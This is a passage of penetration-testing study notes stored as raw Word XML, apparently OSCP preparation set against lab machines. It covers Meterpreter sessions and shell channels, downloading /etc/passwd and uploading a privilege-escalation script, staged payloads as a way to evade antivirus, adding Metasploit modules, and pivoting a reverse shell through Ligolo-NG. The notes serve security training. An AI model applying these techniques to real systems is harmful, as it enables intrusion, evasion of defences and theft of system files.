        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000665">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000666">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for your new meterpreter upgraded session!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000667">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i &lt;new_session_id&gt;</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cs5q41horn43" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Temporary shell in Meterpreter (Channels)</w:t>
      </w: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While inside meterpreter, you can't use certain commands like "find" and "whoami." But, you can get into a shell temporarily to run those:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000066D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000066E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run your commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000066F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>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0670">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1073"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get back into meterpreter</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">channel -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List all channels (temporary shells)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000674">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000675">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">channel -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000676">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="993"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interact with channel (shell) number 1</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_brrxpg6ma4kx" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to interact with local files while using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4806819" cy="2529353"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="189" name="image184.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image184.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId168"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4806819" cy="2529353"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1298"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 41 shows that we could successfully download /etc/passwd to our local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's assume we want to run unix-privesc-check like in a previous Module to find potential privilege escalation vectors. Let's upload the file to /tmp on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="360" name="image347.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image347.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId169"/>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Listing 42 shows that we successfully uploaded </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unix-privesc-check</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the target machine. If our target runs the Windows operating system, we need to escape the backslashes in the destination path with backslashes like "\\".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000681">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="815"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like C:\\Users\\Administrator\\Desktop\\tool.exe instead of C:\Users\Administrator\Desktop\tool.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000682">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_430go0vwrudb" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Staged vs. Non-Staged Payloads</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The difference between these payload types is subtle but important. A </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">non-staged</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload is sent in its entirety along with the exploit. This means the payload contains the exploit and full shellcode for a selected task. In general, these "all-in-one" payloads are more stable. The downside is that the size of these payloads will be bigger than other types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000685">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In contrast, a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">staged</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload is usually sent in two parts. The first part contains a small primary payload that causes the victim machine to connect back to the attacker, transfer a larger secondary payload containing the rest of the shellcode, and then execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000686">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are several situations in which we would prefer to use a staged payload instead of non-staged. If there are space-limitations in an exploit, a staged payload might be a better choice as it is typically smaller. In addition, we need to keep in mind that antivirus software can detect shellcode in an exploit. By replacing the full code with a first stage, which loads the second and malicious part of the shellcode, the remaining payload is retrieved and injected directly into the victim machine's memory. This may prevent detection and can increase our chances of success.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000687">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4814888" cy="2245404"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId170"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4814888" cy="2245404"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="742"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Metasploit, the "/" character is used to denote whether a payload is staged or not, so shell_reverse_tcp at index 20 is not staged, whereas shell/reverse_tcp at index 15 is.</w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uikcrp3udwha" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to upload .rb modules to Metasploit</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Sometimes you will find a module in searchsploit that is supposed to be run in Metasploit, and it will be in Ruby format since that's what Metasploit is written in. </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t xml:space="preserve">In order to upload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000690">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1224"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/.msf4/modules</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000691">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1224"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now from here, you have to create subdirectories depending on where the module should be located within Metasploit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000692">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1224"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId171">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BBSCute</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, where we learned to do this, they created the directory /exploit/unix/webapp/ since that is where their module belonged in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000693">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1224"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once they opened metasploit, that is where they found it</w:t>
      </w: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6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jh27emg69e23" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Building intuition for knowing when to use tunneling/pivots</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get this message "Host '192.168.45.244' is not allowed to connect to this service" message, then you likely have to access it via a pivot/tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000699">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If there's a port only open to local host that's unusual, then it might be running a service that's only accessible through port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000069A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1209"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So look at open ports and see what is only available on 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000069B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1209"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If so, that means it's likely suspicious, so use a tunnel to get access to it from Kali, and then access service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000069C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1198"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP-B .148</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine, I got command execution within the mssql application. But, when I tried pinging my Kali using the command execution, my tcpdump didn't catch anything. This is because the .148 machine was in the 10 subnet and my kali was in the 192 subnet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000069F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1198"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But my Ligolo Pivot was dual-homed and in both subnets, so I was able to set up a listener on the pivot, send the reverse shell connection from .148 to the pivot, which forwarded the connection to my Kali rlwrap, which caught the rev shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1198"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can see more info in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-B .148 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup or in the Ligolo "Port forward from pivot to Kali" section</w:t>
      </w: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4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i0drml7b0et4" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo-NG</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NG stands for "Next Generation" since it's a newer version of Ligolo</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo-NG vs. Chisel:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="963"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
